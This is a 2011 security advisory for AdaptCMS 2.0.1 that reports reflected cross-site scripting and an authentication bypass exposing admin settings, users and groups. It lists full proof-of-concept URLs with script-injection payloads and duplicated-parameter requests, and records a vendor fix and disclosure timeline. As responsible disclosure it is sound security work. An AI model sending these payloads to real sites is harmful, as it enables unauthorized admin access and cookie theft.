AdaptCMS version 2.0.1 suffers from cross site scripting, information disclosure, and authentication bypass vulnerability.
590b7718119cef4f5699e5608269f589d7d8c1bf22f040468240a2227b4dacf8
Advisory: AdaptCMS 2.0.1 Multiple security vulnerabilities
Advisory ID: SSCHADV2011-018
Author: Stefan Schurtz
Affected Software: Successfully tested on AdaptCMS 2.0.1
Vendor URL: http://www.adaptcms.com/
Vendor Status: fixed
CVE-ID: -
==========================
Vulnerability Description:
==========================
AdaptCMS 2.0.1 is prone to multiple security vulnerabilities
==================
Technical Details:
==================
Cross-site Scripting
http://<target>/AdaptCMS/admin.php?view=</script><script>alert(document.cookie)</script>
http://<target>/AdaptCMS/admin.php?view=share&do=</script><script>alert(document.cookie)</script>
http://<target>/AdaptCMS//?'</script><script>alert(document.cookie)</script>
http://<target>/AdaptCMS//index.php?'</script><script>alert(document.cookie)</script>
Authentication bypass / Information Disclosure
http://<target>/AdaptCMS/admin.php?view=/&view=settings
http://<target>/AdaptCMS/admin.php?view=/&view=users
http://<target>/AdaptCMS/admin.php?view=/&view=groups
http://<target>/AdaptCMS/admin.php?view=/&view=levels
http://<target>/AdaptCMS/admin.php?view=/&view=stats
=========
Solution:
=========
"Get the latest AdaptCMS Files" from the admin area
====================
Disclosure Timeline:
====================
24-Sep-2011 - informed developers
24-Sep-2011 - Release date of this security advisory
25-Sep-2011 - fixed by vendor
25-Sep-2011 - post on BugTraq
========
Credits:
========
Vulnerabilities found and advisory written by Stefan Schurtz.
===========
References:
===========
http://www.adaptcms.com/
http://www.insanevisions.com/article/293/News/AdaptCMS-201-Security-Hole
http://www.rul3z.de/advisories/SSCHADV2011-018.txt